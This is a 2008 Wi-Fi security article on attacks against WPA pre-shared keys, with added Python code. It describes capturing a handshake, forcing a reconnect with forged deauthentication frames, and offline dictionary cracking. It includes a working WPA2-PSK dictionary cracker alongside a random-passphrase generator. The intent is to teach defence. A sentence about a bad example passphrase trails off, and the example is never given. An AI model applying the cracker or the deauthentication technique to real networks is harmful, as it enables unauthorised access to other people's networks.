
WPA Security Tips – Wi-FiPlanet.com


By Aaron Weiss

March 27, 2008

While WPA with PSK is more secure than WEP, it is not infallible. Learn how you can use it to its fullest advantage to protect your Wi-Fi network.


Wireless networking might not rank up there with flying cars, but it’s still plenty cool and very useful. (Plus, it actually exists.) But wireless data can be exposed to interception, and although we have encryption protocols intended to prevent security breaches, they are not always 100% effective.

With access to your wireless network, a hacker could intercept sensitive information, such as e-mail messages, or even access shared files. More commonly, a hacker might not want your personal data but your network access. He or she could use your Internet service to engage in criminal activities, such as sharing illegal content or sending spam.

The original WEP protocol designed to protect 802.11b/g networks did not remain secure for very long. Flaws in its design allowed snoopers to extract the keys needed to unlock it from the airborne packet stream. In 2005, more than 45 million credit card numbers were stolen from TJX, parent company of clothing store Marshalls, by compromising its WEP-encrypted wireless network with Wi-Fi gear sniffing packets from outside a store location. WEP hacking tools have matured to the point where even novice hackers can compromise WEP networks in a few clicks and a few minutes. It is no surprise that WEP is no longer recommended for securing wireless networks.

Replacing WEP in 802.11b/g/n networks is WPA, or Wi-Fi Protected Access. The conventional wisdom about WPA is that, unlike WEP, it is not vulnerable to hackers. But this is only partially true. Under certain, often common, conditions it is possible to compromise WPA- or WPA2-encrypted wireless networks. Simply choosing WPA instead of WEP and assuming that all is well is not enough, and could give you a dangerously false sense of confidence. Armed with the right knowledge, though, you can defend yourself against WPA hacks.

The weakness in WPA

Most WPA users authenticate to their network with a pre-shared key (PSK): one passphrase shared by the access point and every client. The alternative, running an 802.1X authentication server, is a complication usually reserved for enterprise deployments.

Unlike WEP, WPA is sophisticated enough that hackers cannot simply extract the PSK from intercepted packets. When a wireless client authenticates with an access point using WPA, it performs an initial handshake, an exchange of packets establishing their relationship. With the right combination of hardware and software, it is possible to intercept and capture these handshake packets. The handshake never carries the passphrase itself, but it does carry values derived from it: each side's random nonce and a message integrity code computed with a key derived from the PSK. A hacker who has captured a successful handshake can therefore work offline, deriving the key for each candidate passphrase in a dictionary and checking whether it reproduces the captured integrity code, until the WPA passphrase is unmasked. No connection to the access point is needed during this phase.

A so-called "brute force" attack like this can take a long time to process, from hours to days, and it may never find a successful match, depending on the WPA passphrase and the thoroughness of the dictionary being used. This is why your best defense is to choose a passphrase that cannot be found in a dictionary.

How hackers hack

Using a readily available suite of command-line tools that can execute each stage of the WPA hacking procedure in Linux or Windows, hackers can collect information about your wireless network and attempt to unlock your WPA passphrase.
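To make the offline phase concrete, here is an added example in Python (not code from the article) that performs the WPA2-PSK dictionary check against a four-way handshake. It assumes the standard 802.11i derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations); the KCK is the first 128 bits of the PTK from PRF-512; and the MIC is HMAC-SHA1 over the second EAPOL-Key frame with its MIC field zeroed (key descriptor version 2, i.e., WPA2/AES). The SSID, MAC addresses, nonces and the handshake frame are constructed inside the script, with a known passphrase used to forge a valid MIC, so it runs with no capture and no network access.

```python
"""
Offline WPA2-PSK dictionary attack against a captured four-way handshake
(added example; not the article's code). All inputs are CONSTRUCTED below.
"""
import hashlib
import hmac

# Byte offset of the 16-byte MIC inside an EAPOL-Key frame:
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are what make each dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 128 bits of the PTK are the KCK, the key that signs the handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist):
    """Try each candidate passphrase; the one reproducing the captured MIC is the PSK.
    Nothing here talks to the network: this is the offline phase the article describes."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


def build_message2(kck: bytes, snonce: bytes) -> bytes:
    """Build a minimal EAPOL-Key message 2/4 (client -> AP) and sign it with the KCK.
    CONSTRUCTED stand-in for a sniffed frame; key data is left empty."""
    body = (b"\x02"             # descriptor type: RSN (WPA2)
            + b"\x01\x0a"       # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"       # key length: 16 (CCMP)
            + b"\x00" * 8       # replay counter
            + snonce            # SNonce (32 bytes)
            + b"\x00" * 16      # key IV
            + b"\x00" * 8       # key RSC
            + b"\x00" * 8       # key ID
            + b"\x00" * 16      # MIC placeholder, filled in below
            + b"\x00\x00")      # key data length
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def constructed_handshake(true_passphrase: str):
    """Fabricate what a sniffer would have captured from a network using true_passphrase.
    SSID, MACs and nonces are made-up constants, not a real capture."""
    ssid = "linksys"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    kck = derive_kck(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return ssid, ap_mac, sta_mac, anonce, snonce, build_message2(kck, snonce)


WORDLIST = ["letmein", "password", "password123", "qwerty", "linksys"]  # tiny stand-in dictionary

if __name__ == "__main__":
    print("weak PSK   ->", crack(*constructed_handshake("password123"), WORDLIST))
    print("random PSK ->", crack(*constructed_handshake("Xk7#pq92!Lm4vB&tR1"), WORDLIST))
```

The first call recovers "password123" because it is in the wordlist; the second returns None because a random passphrase never will be, no matter how long the attacker runs. Note that every guess costs 4096 HMAC-SHA1 iterations, which is the only thing slowing the attacker down; the attack's success depends entirely on whether the passphrase is in the dictionary.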

Fortunately, hackers face a few obstacles in their quest. For starters, to use the required command-line tools successfully, they need a supported wireless card with drivers that have been patched to support "packet injection," the ability for the card to insert packets into an established data stream. Since many major wireless cards are supported, including models commonly found in laptop computers such as the Intel 2100/3945 and most Atheros chipsets, this is only a minor hurdle to overcome.

With the right tool, hackers can put their wireless card into "monitor mode," which means it "sees" all available wireless network traffic rather than only the packets intended for it. Of course, for a hacker to successfully monitor your wireless network, he or she needs to be within close enough physical range to both send and receive packets. Usually this will mean within a couple hundred feet of your access point, but hackers can use advanced equipment, such as directional high-gain antennas, to target sites from two or three times that distance. Wireless sniffing tools make it easy to identify which access points are broadcasting within "earshot" and what security protocol is in effect.

Once the hacker has pulled the unique MAC identifier for the target access point, he or she will check whether any wireless clients are associated with this AP and pull their MAC addresses as well. The hacker's goal is to capture the handshake packets from a client successfully authenticating itself against the target AP. If there are no clients associated with the AP, there is nothing to do but wait until someone connects.

If there are clients associated with the AP, it can be assumed that they know the correct passphrase. But because they are already authenticated, it is too late to capture their handshake. Skillful hackers have a tool, however, that can forge deauthentication packets aimed at the client; in other words, it will kick the client off its connection. This works because 802.11 deauthentication frames are management frames that carry no authentication of their own, so a client accepts one that merely spoofs the AP's MAC address.

When the client re-authenticates with the AP, which in most cases occurs automatically, the hacker can capture the precious handshake packets. With the handshake in hand, so to speak, the hacker no longer needs to interact with the target network at all; all he or she needs is the command-line tool, a dictionary containing hundreds of thousands of words and typical password combinations, and time and patience.

Dictionary defense

WPA security all boils down to the complexity of your passphrase.

For a hacker to unlock the WPA passphrase, that passphrase needs to be contained in whichever dictionary he or she is using. Obviously, a hacker's chance of success improves the larger and more thorough the dictionary. Because hackers' dictionaries are composed mostly of words and simple combinations, the chance that your WPA PSK can be hacked depends on how likely it is to be found in a dictionary, even a very large one. Tempting though it is to choose a passphrase you can easily remember, like the name of your pet or street, doing so is likely to produce a PSK found in a good dictionary.

Your two best defenses against a WPA attack are randomness and length. The passphrase below is bad and can probably be revealed…
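As an added example (not from the article), the Python below generates a passphrase that has both properties and puts numbers on why they matter: a uniformly random passphrase drawn from the 95 printable ASCII characters WPA allows has 95^n possibilities, so each extra character multiplies the attacker's work, while a passphrase that appears in a wordlist is only as strong as the size of that list, however long it is. The guess rate used for the time estimate is an assumed figure, not a measurement.

```python
"""
Random WPA passphrase generation and a back-of-the-envelope cost estimate for
guessing it (added example; not the article's code).
"""
import math
import secrets

# WPA-PSK passphrases are 8 to 63 characters drawn from printable ASCII (codes 32-126).
WPA_ALPHABET = "".join(chr(c) for c in range(32, 127))
MIN_LEN, MAX_LEN = 8, 63


def is_valid_wpa_passphrase(passphrase: str) -> bool:
    """Length and character-set rules a WPA-PSK passphrase must satisfy."""
    return MIN_LEN <= len(passphrase) <= MAX_LEN and all(c in WPA_ALPHABET for c in passphrase)


def generate_passphrase(length: int = 20, alphabet: str = WPA_ALPHABET) -> str:
    """Draw each character uniformly with the secrets module (a CSPRNG), not random.choice."""
    if not MIN_LEN <= length <= MAX_LEN:
        raise ValueError("WPA passphrases must be 8 to 63 characters")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def entropy_bits(length: int, alphabet_size: int) -> float:
    """log2 of the number of equally likely random passphrases of this length."""
    return length * math.log2(alphabet_size)


def dictionary_bits(wordlist_size: int) -> float:
    """A passphrase known to be in a wordlist is worth only log2(wordlist size) bits."""
    return math.log2(wordlist_size)


def expected_crack_years(bits: float, guesses_per_second: float) -> float:
    """Average time to find the passphrase: half the keyspace at the given guess rate."""
    return (2.0 ** bits / 2) / guesses_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    # ASSUMED rate for one CPU running PBKDF2 with 4096 iterations per guess; not measured.
    GUESSES_PER_SECOND = 1000.0
    pw = generate_passphrase(20)
    print(pw, is_valid_wpa_passphrase(pw))
    rand_bits = entropy_bits(20, len(WPA_ALPHABET))
    dict_bits = dictionary_bits(1_000_000)
    print(f"random 20-char passphrase: {rand_bits:.1f} bits, "
          f"~{expected_crack_years(rand_bits, GUESSES_PER_SECOND):.2e} years")
    print(f"word from a 1,000,000-entry list: {dict_bits:.1f} bits, "
          f"~{expected_crack_years(dict_bits, GUESSES_PER_SECOND):.2e} years")
```

The contrast in the last two lines is the whole argument of this section: a million-word dictionary is about 20 bits of work and falls in minutes at the assumed rate, whereas 20 random printable characters are about 131 bits and are out of reach regardless of the rate. Generate the passphrase once, store it in a password manager, and paste it into each client rather than trying to memorize it.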

